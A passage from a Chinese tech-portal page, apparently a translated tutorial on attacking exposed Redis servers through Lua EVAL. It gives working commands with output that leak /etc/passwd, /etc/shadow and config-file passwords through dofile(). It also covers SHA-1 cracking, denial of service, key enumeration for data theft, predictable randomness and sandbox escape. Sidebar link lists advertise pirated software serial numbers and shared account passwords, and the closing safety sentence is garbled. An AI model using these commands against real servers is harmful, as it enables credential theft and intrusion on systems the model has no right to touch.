- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 6Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 7Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9qq郵件是否已讀怎么看 QQ郵箱已經發出去的郵件怎么知道對方是否已經查看
- 10Intel i7-9700K性能跑分曝光:同代提升約12%
- 11AMD推土機架構回顧:雖隕落卻是Zen成功的墊腳石
- 12美國增加25%進口關稅!PC硬件要大漲價
[摘要]EVAL “ return dofile('/etc/passwd')” 0-ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /et...
EVAL “ return dofile('/etc/passwd')” 0
-ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:1: function arguments expected near ':'
EVAL “return dofile('/etc/shadow')” 0
-ERR Error running script (call to f_9882e931901da86df9ae164705931dde018552cb): cannot open /etc/shadow: Permission denied
EVAL “return dofile('/var/www/') ” 0
-ERR Error running script (call to f_8313d384df3ee98ed965706f61fc28dcffe81f23): cannot read /var/www/: Is a directory
EVAL “return dofile('/var/www/tmp_upload/') ”0
-ERR Error running script (call to f_7acae0314580c07e65af001d53ccab85b9ad73b1): cannot open /var/www/tmp_upload/: No such file or directory
EVAL “return dofile('/home/ubuntu/.bashrc')” 0
-ERR Error running script (call to f_274aea5728cae2627f7aac34e466835e7ec570d2): /home/ubuntu/.bashrc:2: unexpected symbol near '#'
如果Lua腳本有語法錯誤或者嘗試設置全局變量時,會產生報錯信息,可以獲得一些我們想要的信息
EVAL “return dofile('/etc/issue')” 0
-ERR Error running script (call to f_8a4872e08ffe0c2c5eda1751de819afe587ef07a): /etc/issue:1: malformed number near '12.04.4'
EVAL “return dofile('/etc/lsb-release')” 0
-ERR Error running script (call to f_d486d29ccf27cca592a28676eba9fa49c0a02f08): /etc/lsb-release:1: Script attempted to access unexisting global variable 'Ubuntu'
EVAL “return dofile('/etc/hosts')” 0
-ERR Error running script (call to f_1c25ec3da3cade16a36d3873a44663df284f4f57): /etc/hosts:1: malformed number near '127.0.0.1'
還有一種情況,但是并不是很常見,就是調用dofile()這個函數去處理有效的Lua文件,然后返回提前定義好的值,假設這里有一個文件/var/data/app/db.conf
db = {
login = 'john.doe',
passwd = 'Uber31337',
}
通過Lua腳本得到passwd的值
EVAL dofile('/var/data/app/db.conf');return(db.passwd); 0
+OK Uber31337
這個也可以獲取Unix標準文件的一些信息:
EVAL “dofile('/etc/environment');return(PATH);” 0
+OK /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
EVAL “dofile('/home/ubuntu/.selected_editor');return(SELECTED_EDITOR);” 0
+OK /usr/bin/nano
0x07 暴力破解
Redis提供一個redis.sha1hex()函數,可以被Lua腳本調用,所以還可以通過Redis服務器進行SHA-1的破解,相關代碼在adam_baldwin 的GitHub上(https://github.com/evilpacket/redis-sha-crack),相關原理的描述在
(http://fr.slideshare.net/evilpacket/ev1lsha-misadventures-in-the-land-of-lua需要********)
0x08 Dos
這里有很多Dos Redis的方法,例如通過調用shutdown這個命令刪除數據。
這里有更加有趣的兩個例子:
1)在Redis的控制端,調用dofile()不加任何參數,將會從標準輸入讀取數據,并把讀取的數據認為是Lua腳本。這個時候服務器依舊在運行,但是不會去處理新的連接,直到在控制端讀取到”^D”(或者重啟)。
2)Sha1hex()函數可以被覆蓋(在任何一個客戶端都可以實現這個效果)。下面展示一個返回固定值的sha1hex()函數
Lua腳本:
print(redis.sha1hex('secret'))
function redis.sha1hex (x)
print('4242424242424242424242424242424242424242')
end
print(redis.sha1hex('secret'))
在Redis的控制端上
# First run
e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4
4242424242424242424242424242424242424242
# Next runs
4242424242424242424242424242424242424242
4242424242424242424242424242424242424242
0x09 數據竊取
如果Redis服務器存儲一些有趣的數據(像session cookie或商業數據),你可以通過get枚舉鍵值,獲取數據。
0x0A 加密
Lua使用完全可以預測的”隨機數”,細節在scripting.c的evalGenericCommand()函數中
/* We want the same PRNG sequence at every call so that our PRNG is* not affected by external state. */
redisSrand48(0);
每一次Lua腳本調用math.random()函數產生的隨機數都是相同數字流:
0.17082803611217
0.74990198051087
0.09637165539729
0.87046522734243
0.57730350670279
[...]
0x0b 遠程命令執行
為了在開放的Redis服務器上進行命令執行,有以下三種情況:
首先能夠修改底層的字節碼,能夠進行虛擬機的逃逸。(Lua的一個例子https://gist.github.com/corsix/6575486);或者是繞過全局保護并且試圖訪問一些有趣的函數。
繞過全局保護是很輕松的(stackoverflow上有一個例子
http://stackoverflow.com/questions/19997647/script-attempted-to-create-global-variable)。然而這么有趣的模塊并不能加載,順便提一下,在這里還有很多有趣的東西(http://lua-users.org/wiki/SandBoxes)。
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1努比亞z11mini什么時候出 nubia z11mini上市時間
- 2努比亞z11mini價格多少錢 nubia z11mini報價
- 3努比亞z11mini設置如何 nubia z11mini參數設置
- 4華為p9與3星s7哪一個好 3星galaxy s7與華為p9比較評測
- 5華為p9與3星s6比較評測 3星galaxy s6與華為p9哪一個好
- 6華為p9與oppo r9plus哪一個好 oppo r9plus與華為p9比較評測
- 7華為p9與華為mate7哪一個好 華為mate7與華為p9比較評測
- 8華為榮耀暢玩5c與5x哪一個好 華為榮耀暢玩5x與5c比較評測
- 9魅族pro6如何打開VoLTE 魅族pro6設置VoLTE技巧方法流程
- 10小米5home鍵一側無反應 小米5home鍵按右側沒反應處理方法
- 11魅藍3與小米2s比較評測 小米2s好還是魅藍3好
- 12魅藍3與小米4c比較評測 小米4c與魅藍3哪一個好
- 1鬼怪大結局是什么?韓劇《鬼怪》大結局第16集視頻鏈接
- 2詳細說明MySQL5.7中的關鍵字與保留字
- 3聯想zuk z2開發者模式如何開 聯想zuk z2開發者模式打開圖文說明教程
- 4谷歌瀏覽器|谷歌瀏覽器屏蔽廣告圖文說明教程 谷歌瀏覽器如何屏蔽廣告
- 5用PS如何將照片背景換成藍色
- 6知道sql語句中where與having的區別
- 7mysql event事件調度器的圖文代碼詳細說明
- 8QQ影音如何截取QQ表情?QQ影音截取QQ表情圖文說明教程
- 9QQ影音如何播放3D視頻?QQ影音播放3D視頻設置技巧
- 10最新愛奇藝會員賬號密碼大全(2017.2.20)
- 113組騰訊視頻會員賬號共享(2017.2.20)
- 12QQ影音如何轉換視頻格式?
